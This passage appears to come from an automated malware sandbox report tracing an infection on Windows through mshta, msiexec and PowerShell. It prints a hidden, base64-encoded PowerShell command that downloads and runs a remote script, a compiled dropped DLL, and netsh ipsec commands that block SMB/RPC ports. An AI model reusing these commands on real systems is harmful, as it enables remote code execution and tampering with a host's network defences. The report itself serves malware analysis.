cgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAUgBlAGcAawBlAHkAcABhAHQAaAAgAC0AbgBhAG0AZQAgAFMAdABhAHkATwBuAFQAbwBwACkADQAKAA==Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pyyender\pyyender.cmdline'Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9817.tmp' 'c:\Users\user\AppData\Local\Temp\pyyender\CSC56C194C6654CA9A4EBAB4D48E4014.TMP'Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' interface ipv6 installJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add policy name=qianyeJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filterlist name=Filter1Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCPJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCPJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCPJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDPJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDPJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDPJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCPJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCPJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCPJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCPJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCPJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000008.00000002.1099998909.0000000000A40000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMwAuAGoAcABnACcAKQANAAoA
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMwAuAGoAcABnACcAKQANAAoAJump to behavior
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pyyender\pyyender.cmdline'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pyyender\pyyender.cmdline'Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\pyyender\pyyender.dllJump to dropped file

Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX